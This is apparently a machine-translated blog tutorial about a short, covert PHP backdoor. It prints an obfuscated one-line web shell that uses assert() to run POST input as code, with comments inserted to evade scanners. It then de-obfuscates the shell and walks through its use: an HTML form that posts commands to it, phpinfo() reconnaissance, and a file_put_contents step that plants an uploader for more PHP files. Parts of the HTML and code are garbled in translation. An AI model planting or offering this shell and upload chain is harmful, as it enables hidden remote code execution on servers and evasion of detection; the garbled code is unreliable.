This article will introduce a very short code, but also a very covert backdoor Trojan, so that everyone in the detection program can avoid being hung Trojan.
The contents of the file are as follows:
$_="s"."s"./*-/*-*/"e"./*-/*-*/"r";@$_=/*-/*-*/"a"./*-/*-*/$_./*-/*-*/"t";@$_/*-/*-*/($/*-/*-*/{"_P"./*-/*-*/"OS"./*-/*-*/"T"}[/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]);?>
A lot of comments are inserted into the code, and the server's detection program is difficult to detect if it is not rigorous.
After removing the annotation, the code is as follows:
@$_="s"."s"."e"."r";@$_="a".$_."t";@$_(${"_P"."OS"."T"}[0-2-5]);?>
Finally, the actual execution of the code content is:
assert(${"_POST"}[-7]);?>
The original backdoor is the use of the PHP assert method to execute the program.
boolassertstring $description ] )
ASSERT () checks the specified assertion and takes appropriate action when the result is FALSE.
If assertion is a string, it will be executed by assert () as PHP code.
If the content of the $assertion is phpinfo (); The server's information is returned so that the attacker can gain access to the server information for this attack.
After uploading the backdoor, the attacker could simply create a simple HTML to execute the PHP statement on the server.
Suppose the backdoor file is backdoor.php
< html ; < head ; < title ; back door !-- title ; !-- head ; < body ; < form name = "Form1" method = "POST" action = "http://www.example.com/backdoor.php" ; < p ; < textarea name = "-7" style = "width:500px; height:300px "; !-- textarea ; !-- P ; < p ; < input type = "Submit" value "Submit" , !-- p , !-- form , !-- Span-->body ; !-- html ;
Attack Mode:
1. Get Server information to enter
phpinfo();
2. Create a file that can be easily uploaded PHP can input
file_put_contents('hack.php''
name\'][\'tmp_name\'], dirname(__FILE__).\'/dest.php\');?>' ,true);
Then create an HTML call to upload the file hack.php
< html ; < head ; < title , upload !-- title , !-- head ; < body ; < form name = "Form1" method = "POST" action = "http://www.example.com/hack.php" enctype = "Multipart/form-data" ; < p ; < input Type = "file" name = "name" ; !-- P ; < p ; < input type = "Submit" Value = "Submit" , ,!-- p , !-- form ; !-- body ; !-- html ;
After that, you can upload PHP files to execute.
Copyright NOTICE: This article for Bo Master original article, without Bo Master permission not reproduced.
The above describes the code short and covert backdoor Trojans, including aspects of the content, I hope that the PHP tutorial interested in a friend helpful.